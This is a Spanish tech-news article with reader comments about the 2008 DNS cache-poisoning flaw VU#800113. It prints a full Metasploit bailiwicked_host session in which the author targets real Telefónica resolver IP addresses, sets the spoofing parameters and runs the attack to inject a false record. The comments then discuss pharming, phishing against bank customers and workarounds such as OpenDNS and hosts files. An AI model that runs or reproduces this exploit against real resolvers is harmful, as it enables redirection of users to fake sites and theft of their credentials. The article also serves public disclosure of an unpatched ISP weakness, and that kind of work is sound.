BandaAncha.eu

  • 🔍 en 📰 artículos ⏎
  • 🔍 en 👇 este 📰 artículo ⏎
  • 🔍 en 💬 foros ⏎
Regístrate Regístrate Identifícate Identifícate
  • 📰 Artículos

Envenenando los DNS de Telefónica

Joshua Llorach

Actualización: Listado de DNS vulnerables y un documento sobre como modificar las DNS de tu ordenador.

Desde el día 8 de este mes se viene especulando sobre los detalles de la vulnerabilidad VU#800113, un fallo que ha recorrido como un calambre la espina dorsal de la red, los resolvedores de nombres de dominio DNS.

Hace unos días se filtraron las especificaciones técnicas y no ha habido que esperar mucho para que aparezca en la red herramientas que permitan a cualquier persona desde su ordenador, sacar provecho de la vulnerabilidad.

Algo más de dos semanas después del anuncio y con los parches en la calle, hemos querido saber si los proveedores de internet españoles han hecho los deberes.

El servidor DNS ns1.telefonica-data.com es uno de los más utilizados por los usuarios que navegan en España. Lo hemos interrogado y esto es lo que nos ha contado.

 josh@josh:~$ dig ns1.telefonica-data.com
 ...
 ;; ANSWER SECTION:
 ns1.telefonica-data.com. 300 IN A 194.224.52.36
 ...

Tenemos su IP.

 _ _ _ _ | | | | (_) |
 _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
 | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
 | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
 |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
 | |
 |_|
 =[ msf v3.2-release
 + -- --=[ 298 exploits - 124 payloads
 + -- --=[ 18 encoders - 6 nops
 =[ 65 aux
 msf > use spoof/dns/bailiwicked_host
 msf auxiliary(bailiwicked_host) > set RHOST 194.224.52.36
 RHOST => 194.224.52.36
 msf auxiliary(bailiwicked_host) > check
 [*] Using the Metasploit service to verify exploitability...
 [*] >> ADDRESS: 195.53.204.135 PORT: 57190
 [*] >> ADDRESS: 195.53.204.135 PORT: 57190
 [*] >> ADDRESS: 195.53.204.135 PORT: 57190
 [*] >> ADDRESS: 195.53.204.135 PORT: 57190
 [*] >> ADDRESS: 195.53.204.135 PORT: 57190
 [*] FAIL: This server uses static source ports andis vulnerable to poisoning

Lo primero que hemos observado es que los administradores de sistemas si han hecho algo. Al enviarle una petición DNS que no tiene cacheada, debe interrogar a otros DNS remotos. No lo hace desde su misma IP, si no desde otros servidores que Telefónica ha habilitado. Solo hace falta averiguar cual es la IP del servidor que realmente hace la petición para hablar con el.

 msf auxiliary(bailiwicked_host) > set RHOST 195.53.204.135
 RHOST => 195.53.204.135
 msf auxiliary(bailiwicked_host) > check
 [*] Using the Metasploit service to verify exploitability...
 [*] >> ADDRESS: 195.53.204.135 PORT: 57190
 [*] >> ADDRESS: 195.53.204.135 PORT: 57190
 [*] >> ADDRESS: 195.53.204.135 PORT: 57190
 [*] >> ADDRESS: 195.53.204.135 PORT: 57190
 [*] >> ADDRESS: 195.53.204.135 PORT: 57190
 [*] FAIL: This server uses static source ports and is vulnerable to poisoning
 msf auxiliary(bailiwicked_host) > set HOSTNAME dnspoisoning.bandaancha.eu
 HOSTNAME => dnspoisoning.bandaancha.eu
 msf auxiliary(bailiwicked_host) > set NEWADDR 89.248.99.18
 NEWADDR => 89.248.99.18
 msf auxiliary(bailiwicked_host) > set SRCPORT 0
 SRCPORT => 0
 msf auxiliary(bailiwicked_host) > run
 [*] Switching to target port 57190 based on Metasploit service
 [*] Targeting nameserver 195.53.204.135 for injection of dnspoisoning.bandaancha.eu. as 89.248.99.18
 [*] Querying recon nameserver for bandaancha.eu.'s nameservers...
 [*] Got an NS record: bandaancha.eu. 172186 IN NS ns1.vectrice.com.
 [*] Querying recon nameserver for address of ns1.vectrice.com....
 [*] Got an A record: ns1.vectrice.com. 171997 IN A 89.248.99.18
 [*] Checking Authoritativeness: Querying 89.248.99.18 for bandaancha.eu....
 [*] ns1.vectrice.com. is authoritative for bandaancha.eu., adding to list of nameservers to spoof as
 [*] Got an NS record: bandaancha.eu. 172186 IN NS ns2.vectrice.com.
 [*] Querying recon nameserver for address of ns2.vectrice.com....
 [*] Got an A record: ns2.vectrice.com. 171997 IN A 89.248.99.18
 [*] Checking Authoritativeness: Querying 89.248.99.18 for bandaancha.eu....
 [*] ns2.vectrice.com. is authoritative for bandaancha.eu., adding to list of nameservers to spoof as
 [*] Got an A record: ns2.vectrice.com. 171997 IN A 89.248.99.18
 [*] Checking Authoritativeness: Querying 89.248.99.18 for bandaancha.eu....
 [*] ns2.vectrice.com. is authoritative for bandaancha.eu., adding to list of nameservers to spoof as
 [*] Attempting to inject a poison record for dnspoisoning.bandaancha.eu. into 195.53.204.135:57190...
 [*] Sent 1000 queries and 30000 spoofed responses...

El resto de la película no es apta para todos los públicos. Realmente lo que hemos hecho es inyectarle un información falsa sobre el dominio dnspoisoning.bandaancha.eu que hemos creado para la ocasión. Sus DNS autoritativos apuntan a la IP
89.248.99.20 y el exploit lo que hace es envenenar el servidor con información falsa de modo que apunte a la IP
89.248.99.18.

Desde ayer, el analizador de servidores DNS realiza pruebas diarias a diferentes servidores de operadoras españolas y muestra su estado.

💬 Comentarios

BocaDePez
BocaDePez
-1

esto me recuerda alos CON CON MP3 = pantallazo azul..

Podrias comentar que en la IP falsa podria haber un servidor phising de PayPal o eBay o el banco que te pario. :)

VIVA LAS VULNERABILIDADES Y VIVA LA REPUBLICANA BANANERA DE ESPAÑA

🗨️ 23
BocaDePez
BocaDePez

Y para el común de los mortales sin conocimientos de redes ¿en que nos afecta realmente esa vulnerabilidad? ¿en que algún sujeto malintencionado puede suplantar webs o algo más peligroso?

Perdón por mi desconocimiento.

🗨️ 18
djnacho
2

Esa vulnerabilidad, significa, que alguien puede lanzar un ataque contra un servidor DNS cualquiera, y empezar a cambiar las IP's a las que apuntan los dominios. Por decirlo de una forma sencilla. Tu banco X, tiene como dirección http://banco.com, y el servidor DNS traduce banco.com, por la IP 1.2.3.4. Si alguien hace un ataque a un servidor DNS, y cambia la IP 1.2.3.4 por otra (5.6.7.8, por ejemplo), resulta que ya no accedes a tu banco, sino a la web del atacante.

Ahora imagínate que el atacante crea una página casi idéntica a la web del banco. Tu meterías tus datos, creyendo que estás accediendo a tu banco, y ¡¡ZAS!!, tus claves de acceso a tu cuenta en el banco, ya las sabe el atacante. Sólo le queda acceder a la dirección real del banco, meter tus claves y.... adiós pasta. Esto es un ejemplo, pero...., si no hacen nada, ya os digo yo que se convertirá en un peligro de lo más real.

Un saludo :)

🗨️ 17
BocaDePez
BocaDePez

Yo entiendo que acabarian con mis ahorros si a la web de mi banco se accediera simplemente con un login y un password , pero hay bancos que tienen un teclado virtual en el cual digitas tu password , otros usan unas tarjetas de coordenadas en la que en cada sesion es distinta y el codigo de la coordenada te la envian a tu móvil , y también usan teclado virtual , no se yo donde esta el problema , el caos estara en las webs chapuza de los bancos cutres

🗨️ 15
usuario-eliminado

eso ya es mucho liar, mientras haya un solo banco que no tenga ese tipo de sistemas, la vulnerabilidad es algo real y que podría terminar en tragedia para mucha gente

🗨️ 10
BocaDePez
BocaDePez
🗨️ 8
BocaDePez
BocaDePez
🗨️ 7
BocaDePez
BocaDePez
🗨️ 6
XpeedMan
🗨️ 5
BocaDePez
BocaDePez
🗨️ 4
BocaDePez
BocaDePez
🗨️ 2
BocaDePez
BocaDePez
🗨️ 1
BocaDePez
BocaDePez
BocaDePez
BocaDePez
BocaDePez
BocaDePez

Las tarjetas de coordenadas sí te pueden salvar, pero vamos, si digitas una password qué más da que lo hagas en el teclado físico como en el virtual en lo que atañe a este caso.

🗨️ 3
BocaDePez
BocaDePez
🗨️ 2
BocaDePez
BocaDePez
🗨️ 1
BocaDePez
BocaDePez
BocaDePez
BocaDePez

Eso sería si tu banco son una panda de chacaritas que no se han preocupado de invertir.

En el mío puedes tener todos los datos de acceso incluída la llave de transferencia que algo te iba a faltar para poder enviar. Como no me robes el móvil...

Cosas como el Pharming te lleva a plantearte muy seriemante a que banco vas a dejar que te robe el dinero.

BocaDePez
BocaDePez

por fin alguien comenta ésto de modo funcional y no meramente técnico....

zErop

Que mp3? Que pantallazo? Me he perdido.

BocaDePez
BocaDePez
-1

Tu ni siquieras sabes de lo que estas hablando. Que cojones es CON?

🗨️ 1
togashi05
1

El bug al que hace referencia es de los tiempos de windows 95 y creo que 98 primera edicion.

Tu le dabas a Inicio> Ejecutar y al poner "con/con" el sistema se freia con una bonita pantalla azul.

Bodescu

Amn... Josh... Aunque la peli no sea apta para todos los pubblicos (una pena, me quedo con ganas de ver el final, aunque con lo que he visto ya he tenido suficiente como para tratar de hacer un pase privado ;) ), y aunque odio ser un destripafinales, talvez si estaria bien que cuentes como acaba el asunto...

Todos sabemos que el mayordomo es el culpable, pero... Se ha logrado un envenenamiento real?

Un saludo

🗨️ 6
Josh
1

Como entenderás, dependiendo de quien pregunte, hay una respuesta distinta, así que mejor no responder ;)

🗨️ 5
Bodescu

No digas mas, a buen entendedor... ;)

Un saludo

🗨️ 3
djnacho
3

No hace falta que Josh te ponga nada ;) . Mira el enlace que Josh te pone en la noticia (es este), y verás más o menos lo que te interesa, y una cosa muy importante, que es código fuente completo del programa, con el que se puede ver como se realiza el ataque (increible, que una cosa tan chorra, produzca un efecto tan devastador en los servidores DNS, y llevamos desde el día 9 sin que la mayoría de los ISP muevan un puñetero dedo para arreglarlo, cuando deberían tener los huevos de corbata, porque como alguien utilice ese código, y comienze a cambiar IP's en los servidores DNS, vas a ver la gracia que nos va a hacer a nosotros, y la de cabezas que van a caer, por culpa de no actualizar los servidores DNS).

Un saludo :)

🗨️ 2
BocaDePez
BocaDePez
-1

+6

Bodescu

Lo se, lo se. Con el peaso enlace del Metasploit y un poco de paz y ciencia, he podido llegar yo solito hasta el final de la pelicula xD

Un saludo

BocaDePez
BocaDePez

osea que a mas de uno nos la habeis colao....mira que sois malos :D

BocaDePez
BocaDePez
1

He enviado la noticia a meneame con la recomendacion de que se use openDNS. Si telefonica no hace sus deberes, almenos intentemos arreglar algo nosotros.

🗨️ 2
BocaDePez
BocaDePez

en 30 min ya esta en portada de esa web, muy bien por tu parte.

🗨️ 1
BocaDePez
BocaDePez

Entonces a todo esto que dnd por ejemplo podri aponer que no sean vunerable?

y por ultimo que herramienta hay para verificar si mis dnd es vunerable porque yo tengo son de ya.comq no vienen en la lista de dns que viene enla noticia

BocaDePez
BocaDePez
-2
🗨️ 1
BocaDePez
BocaDePez

he llamado a telefonica, en mi caso movistar ya que tengo conexion 3g,y no saben nada, la unica solucion que te dan es codificar los datos suyos de movistar y ya esta.

algien sabe que dns puedo utilizar, ya que utiliza las mismas que telefonica.

BocaDePez
BocaDePez

Yo no sé mucho de esto pero: "el dominio dnspoisoning.bandaancha.eu que hemos creado para la ocasión. Sus DNS autoritativos apuntan a la IP 89.248.99.20" Si miro, veo que eso no es verdad: iptools.com/dnstools.php?tool=dns&user_d…ha.eu&type=A ;; ANSWER SECTION: dnspoisoning.bandaancha.eu. 172204 IN A 89.248.99.20 ;; AUTHORITY SECTION: bandaancha.eu. 121433 IN NS ns2.vectrice.com. bandaancha.eu. 121433 IN NS ns1.vectrice.com. ;; ADDITIONAL SECTION: ns1.vectrice.com. 121433 IN A 89.248.99.18 ns2.vectrice.com. 121433 IN A 89.248.99.18 Ahí se puede ver que los servidores de nombre autoritativos (ns1.vectrice.com y ns2.vectrice.com) asocian ese dominio a la IP 89.248.99.18 :-?

🗨️ 18
BocaDePez
BocaDePez

Pues que alguien le responda a este boca de pez porque es verdad lo que dice: los servidores de nombres apuntan a la IP 89.248.99.18 y no a la 89.248.99.20 como dice la noticia (estoy usando OpenDNS)

🗨️ 15
BocaDePez
BocaDePez

Que uses opendns no te garantiza proteccion 100%

Los dns funcionan delegando las operaciones. Como se dice en el articulo, cuando un dns no conoce un nombre, tiene que enviar una peticion de resolucion a un dns que lo conozca, y luego es cuando lo cachea.

Si el dominio dnspoisoning.bandaancha.eu tiene como responsable un dns de telefonica, los dns de opendns tienen que preguntarle al de telefonica por la ip, y estos responderán lo que les venga en gana. Por eso seguias viendo la ip 18, no es culpa de opendns, si no de telefonica.

Esto es todavia mas grave si pensamos que las empresas medianas-grandes tienen todas sus propios dns, que son las que responden por sus subdominios. ¿Razones para preocuparse? Yo creo que muchas.

Un saludo.

🗨️ 14
djnacho
2

Por eso es tan grave este fallo. Si un servidor DNS no es capaz de resolver un nombre de dominio, intentará conectar con otro, para que le devuelva la IP de ese dominio. Si el otro servidor ya ha sido atacado, entonces la IP que se devuelve a OpenDNS es una IP falsa, con lo que el problema, lejos de arreglarse, se acentúa, ya que al final, los servidores DNS de OpenDNS acabarían siendo envenenados, no por ataque, sino por peticiones a otros servidores DNS.

Esto es para que veais, que el problema, es de los BIEN GORDOS, y que tienen que hacer algo, y ya, porque si las herramientas para atacar están disponibles, sólo falta gente para utilizarlas (mientras tecleo esto, seguro que alguien ya está empezando a cambiar IP's en servidores DNS, así fijaos el problema).

Un saludo :)

BocaDePez
BocaDePez

No quiero parecer un troll, pero sinceramente se están diciendo demasiadas burradas en este hilo. El bug _sólo_ afecta a los servidores DNS que CACHEAN respuestas. Eso incluye los de tu router, el de tu propio PC, y los de tu ISP; pero no los de la página web.

🗨️ 12
BocaDePez
BocaDePez

Vale, pues no seas troll.

Las paginas web no tienen servidores dns. Tu router almacena ips, al igual que cualquier CUALQUIER servidor dns a dia de hoy. Imagina que quieres ver tubanco.com, pero como tu dns es vulnerable, al hacer la pregunta al servidor, este te proveera de una ip erronea, que casualmente desplegara la web tupastapami.es. esa web esta calcada de la original, pero no lo es. ya veras que risa, cuando metas tu clave...

Al hacer cache de las respuestas, tu router tiene en su tabla que la ip tal corresponde a la web tubanco.com. asi que cada vez que quieras ir vas a tener que, por un lado, fiarte de lo que tu router almacena, o bien preguntar de nuevo, y te surtiran de nuevo con la ip falsa.

Pero es que yo tambien trabajo con tu banco, y quiero yr a la web. Asi que mi router, que no tiene la ip, hace la consulta al servidor dns. Este servidor no tiene esa correspondencia, asi que consulta a otros dns. entre ellos, tu router. ZAS! Ya tengo la web lista para descargar, y mi equipo me la sirve. Me sirve la web fake, claro, con lo que la risa va a ser descomunal.

Te das cuenta? Las webs no tienen dns, ni tienes por que llegar a una web desde el mismo dns.

Es un problema realmente grave, y no hacen nada por solucionarlo.

Salu2

🗨️ 11
BocaDePez
BocaDePez
-1
🗨️ 10
Bodescu
🗨️ 9
BocaDePez
BocaDePez
🗨️ 8
Bodescu
🗨️ 7
BocaDePez
BocaDePez
-1
🗨️ 6
Bodescu
🗨️ 5
BocaDePez
BocaDePez
-1
🗨️ 3
BocaDePez
BocaDePez
1
BocaDePez
BocaDePez
BocaDePez
BocaDePez
BocaDePez
BocaDePez
Josh
1

La línea

 ANSWER SECTION: dnspoisoning.bandaancha.eu. 172204 IN A 89.248.99.20

te dice que su IP es la acabada en 20. Lo que acaba en 18 son los DNS autoritativos y tb la IP a inyectar.

casiano-ortega

Al final k pasa con todo est son seguras las paginas de los bancos? se ha arreglado el problema de las dns? Yo les he cambiado por las opendns..Pero no me atrevo a hacer ninguna operacion..

Gracias

zErop
-1

Y eso no es ilegal...?

🗨️ 3
campi

Lo que es ilegal es que telefonica conociendo dicha vulnerabilidad no haga absolutamente nada..

🗨️ 2
BocaDePez
BocaDePez

Y yo pregunto... si tengo la mala (o buenísima suerte) de ser "pescado" con este sistema y todos mis ahorros se van a la cuenta de otro... no tendría el responsable (Teléfonica) que hacerse cargo por ello¿? Si bien es cierto que ellos no realizan directamente el fraude, podrian ser consideradas complices por permitirlo.

Saludos!!

🗨️ 1
nopenope

Entiendo que son responsables subsidiarios, efectivamente, pero eso debe sentenciarlo un tribunal (mayormente porque el propio atacado puede producir el fraude para extorsionar a su ISP). Es decir, abogado y denuncia.

BocaDePez
BocaDePez

yo hace dias que vengo tirando con las dns de "open dns",ya que los de timofonica es verdad que no ponen solucion al tema.

a diario le paso el DNS Checker de dankaminsky.com (con las dns originales de timofonica) para comprobar si ya lo han solucionado,pero almenos hasta hace 5 minutos que es la ultima vez que se lo he pasado seguimos igual.

la verdad es que es una verguenza que a dia de hoy aun estemos asi,pero es lo que hay :(

saludos

🗨️ 3
Cehona

Tengo las DNS de Timofonica que no son vulnerables segun la pagina

de bandaancha

/analizador-dns

80.58.32.97

80.58.0.33

Pero la pagina de Dan Kaminsky me las detecta con otra IP vulnerable

www.doxpara.com/

Your name server, at 80.58.32.105, appears vulnerable to DNS Cache Poisoning.

¿ hacen saltos de servidores DNS recursivos los de Telefonica a servidores sin parchear?

🗨️ 2
BocaDePez
BocaDePez

Lo primero que hemos observado es que los administradores de sistemas si han hecho algo. Al enviarle una petición DNS que no tiene cacheada, debe interrogar a otros DNS remotos. No lo hace desde su misma IP, si no desde otros servidores que Telefónica ha habilitado. Solo hace falta averiguar cual es la IP del servidor que realmente hace la petición para hablar con el.

🗨️ 1
BocaDePez
BocaDePez

de verdad, dejar de decir idioteces, yo esque alucino con la cantidad de chorradas que se estan diciendo en este hilo, no teneis ni pajolera idea de como funcionan las cosas........................ y no dire más

BocaDePez
BocaDePez

Segun Doxpara.com el servidor 87.216.1.65 de jazztel tambien es vulnerable.

Your name server, at 87.216.1.65, appears vulnerable to DNS Cache Poisoning.

All requests came from the following source port: 1053

¿Alguien sabe algun DNS no vulnerable de Jazztel?

🗨️ 2
BocaDePez
BocaDePez

Los DNS que uses no tienen que ser propios del proveedor.

Yo uso los de opendns

208.67.220.220

208.67.222.222

Estos no són vulnerables

🗨️ 1
BocaDePez
BocaDePez

No son vulnerables, siempre que dispongan de la info que les pides.

Como tengan que hacer consulta a otros dns y esos si sean vulnerables, ya veras...

En la practica, ningun dns es seguro, porque de un modo u otro, todos dependen de todos.

Salu2

nopenope

En Kriptópolis tienen un par de links muy interesantes, por un lado citan otras webs donde se sugiere que el uso de productos de Microsoft podría ser la causa de la falta de parcheado de esta gravísima vulnerabilidad (aquí). Por otro, esta página es muy buena para que cada uno compruebe la vulnerabilidad de las DNS que usa, aparte la ya conocida de Doxpara y otras similares que hay por ahí.

🗨️ 3
BocaDePez
BocaDePez
-2

Kriptopolis, todo un referente de objetividad sin duda... xDDD

🗨️ 2
BocaDePez
BocaDePez

Porque???

danifv

¿? ¿Por qué?

raxor
2

Si josh ha podido en 20 minutos hacer esta prueba de concepto sin ser un juaker, que no habran hecho las mafias que se dedican al phising, esto es un filon para ellos, debemos andar con cautela los sysadmins, yo de momento estoy protegiendo la red que administro con OpenDNS.

Gracias Josh, quizas este es el empujoncillo anime a los que deciden a arreglar el problema URGENTEMENTE en las DNS del mayor ISP español.

🗨️ 2
usuario-eliminado

como bien apunta djnacho justo encima, usar opendns no garantiza la proteccion, porque aunque los servidores estén asegurados, al adquirir nuevas IP's, otros dns pueden darle IP's incorrectas.

🗨️ 1
inar

Lo primordial sería corregir el problema en los dns raíz para intentar evitar replicaciones erroneas. Pero luego está el problema para ellos de como diferenciar las IPs suplantadas de simples actualizaciones, cuando les llegan de otros servidores.

El problema no es fácil de resolver, ya que un solo servidor DNS vulnerable supone un alto riesgo para el resto.

BocaDePez
BocaDePez
-2
🗨️ 8
BocaDePez
BocaDePez

vamos que no tienes ni idea del tema, no??

si no usas ninguna es que usas las de por defecto. osea tu isp se las da a tu ruter.

BocaDePez
BocaDePez

¡Ahí estamos!, ¡con un par!, yo también me sé las ips de las páginas que suelo visitar, en 30seg te podría escribir un etc/hosts listo para ser usado sin dns alguno. </ironía>

raxor

Siempre que cargas una web usas un servidor DNS que resuelve su nombre y lo convierte en la IP, normalmente el usuario medio deja que sea su ISP el que le asigne el servidor DNS automaticamente, si por ejemplo tienes ADSL de telefonica pues estaras usando DNS de telefonica etc...

El servidor DNS se puede configurar manualmente y no afecta para nada a la conexion, es decir, puedes tener adsl de telefonica y tener configuradas las DNS de ONO y funcionaria.

Así que podemos asegurar que SI usas DNS ;)

PD: Salvo que tengas el fichero hosts rellenado a pelo con todas las IP's de las webs que visitas como dice el compañero. ;)

🗨️ 1
djnacho

En el último caso, no puede acceder a ninguna dirección que no exista en el fichero hosts (es decir, una auténtica locura, ya que no podrías acceder a ninguna IP que no apareciese en el fichero hosts). Es como si una persona ciega sólo puediera ver, si entra en un determinado comercio de su ciudad. Si sale de el, vuelve a quedarse ciega. Es decir, no sirve de gran cosa. Para algo se crearon los servidores DNS's, precisamente para evitar cosas como el ejemplo que he citado antes ;)

Un saludo :)

usuario-eliminado
1

jajaja, me parto el culo con gente como tu

BocaDePez
BocaDePez
1

Supongo que si no sabes que "a" se escribe con H "ha", menos aún sabrás lo que es un servidor DNS. Leer semejantes faltas de ortografía, duele, pues revela el mínimo nivel cultural de los españoles. Ni un niño de 2º de E.G.B. comete esas atrocidades.

BocaDePez
BocaDePez

Me importa un carajo que suba la gasolina, porque yo no la he usado nunca. Y os dejo que tengo que ir a lavar el coche.

A veces es mejor estarse calladito.

🗨️ 1
BocaDePez
BocaDePez

Y yo de gente como tú.

El chaval ha entrado en la página y algo ha leido, y eso es mucho más que la media. :P

BocaDePez
BocaDePez

me encanta que la gente se invente las cosas para darle sensacionalismo a las noticias

esos dns NO son los de telefonica para usuarios de adsl, hacerle un whois a las IP, no son IPs de RIMA. por lo tanto la afirmacion de que son los dns mas usados para navegacion en españa es falsa. Los DNS de usuarios adsl de telefonica son 80.58.X.X

🗨️ 5
djnacho
inetnum: 194.224.52.0 - 194.224.53.255

 netname: TSAI

 descr: Telefonica Servicios Avanzados de Informacion (TSAI)

 descr: Telecommunications research

Esas IP's pertenecen a la red de Telefónica. Y si, son usadas para ADSL, tanto de usuarios residenciales, como de empresas.
No te creas que porque una IP no pertenezca a RIMA, no es de telefónica.

Un saludo :)

🗨️ 4
BocaDePez
BocaDePez
-4
🗨️ 3
BocaDePez
BocaDePez
3
🗨️ 1
tonikelope

Vayáis apuntando en algún lado la dirección IP de la web de vuestro banco (Aparte de cambiar las DNS claro).

Salu2 ;)

🗨️ 5
BocaDePez
BocaDePez

+10, el consejo más sensato en todo el hilo para quien no lo entienda, es simplemente cambiar en tus bookmarks el enlace de tu banco (por ejemplo la pagina de entrada de uno-e): (link roto) por: (link roto) En definitiva, no usar DNSs. Buen consejo, y sirve para cualquier enlace sensible

🗨️ 3
Frankie2004
1

Eso no siempre puede servir, ya que el propio servidor Web y usando características del protocolo HTTP/1.1 puede volver a pedir la siguiente página por nombre aunque el cliente (tu navegador) haya iniciado la primera consulta por IP. Aparte que con la escasez de IPs pueden existir diferentes Webs en la misma máquina; eso no suele pasar en los bancos, pero no se puede saber a priori.

Lo seguro en este caso, es incluir la asociación Web <> IP en tu fichero HOSTS de tu sistema operativo:
* /etc/hosts en Linux, MacOsX y otros derivados Unix o BSD
* %SystemRoot\system32\drivers\etc\hosts en Windows

Normalmente, y a no ser que se configure el sistema operativo para lo contrario, el fichero hosts tiene prioridad sobre los resultados DNS.

🗨️ 2
BocaDePez
BocaDePez
-1

exacto, el HOSTS es la solucion

Unico problema: cambian ip en el servidor y te vuelves loco hasta que te acuerdes que cambiaste el hosts.

🗨️ 1
BocaDePez
BocaDePez
1

El fichero LMHOSTS es un atraso monumental. Esa no es la solucion al problema.

La solucion al problema pasa por modificar el protocolo de consulta DNS de manera que cada servidor se autentique de forma univoca, y ademas no se pueda suplantar su identidad.

Si, nadie ha dicho que sea facil, ni tampoco que sea barato. Joer, ni siquiera se ha dicho que sea viable. Lo se...

Lo que no es viable es tener que apuntar las ips de los sites en un ridiculo fichero: Eso seria el fin de la red tal como la conocemos. Imaginas no poder ir a Google a buscar algo??? Imaginas que no puedes ver una web solo porque te falta su ip en el dichoso fichero de hosts? Por cierto... Cual es la maldita ip? Como saber que ip tiene la web de bandaancha si no me puedo fiar de los resolvedores??

Hay que espabilar, y parchear la vulnerabilidad ya. Ni mas ni menos. Pero claro... eso cuesta una cantidad ingente de pasta y recursos que los isps no estan dispuestos a poner, aun conociendo el riesgo...

Al final, acabamos pagando los de siempre. Al tiempo.

Salu2

BocaDePez
BocaDePez

quizás no sea necesario todo esto, algunos bancos al menos tienen medidas anti phishing y al pedirles su pagina de login se establecen conexiones de confirmacion con Verisign. Esto ayuda a luchar contra las suplantaciones, lo acabo de comprobar en un uno-e y barclays

lema442

Las dns que salen con el signo ? que siginifica?? que no saben si son vulnerables o no?'

BocaDePez
BocaDePez

Si telefonica no espavila, al final de esta semana no quedara un servidor sin ser atacado.

(link roto)

BocaDePez
BocaDePez

Bueno,

Primera sorpresa de la mañana al comprobar que las DNS de Telefónica están siendo manipuladas...

Funciona: www.elperiodico.com

NO funciona (está maniulada): www.elperiodico.cat

Increíble que la gente de Telefónica no esté solucionando el tema. Ahora mismo, no me atrevo a consultar el estado de mi cuenta bancaria a través de internet. El phishing es más indetectable que nunca!

Que lo arreglen ya, por favor!! :-S

Saludos.

🗨️ 1
BocaDePez
BocaDePez

Oh! Ahora la web www.elperiodico.cat funciona otra vez... ¿Tendrá Telefónica gente haciendo horas extras para arreglar enlaces?

¿Habrá gente haciendo el proceso inverso, convirtiendo esto en una especie de pelea?

Wow... El tema es fascinante (y preocupante!)

BocaDePez
BocaDePez
1

La gente no se entera.....da igual que dns useis..ya que si no consigue resolver una direccion..realizara una peticion a otro servidor dns..y aceptara como buenos los datos que este le de.. ¿solucion?..parchear todos los servidores dns.

BocaDePez
BocaDePez
1

Espero que a nadie se le ocurra envenenar las queries de la Innombrable para que apunten a vaya-usted-a-saber-donde, por ejemplo...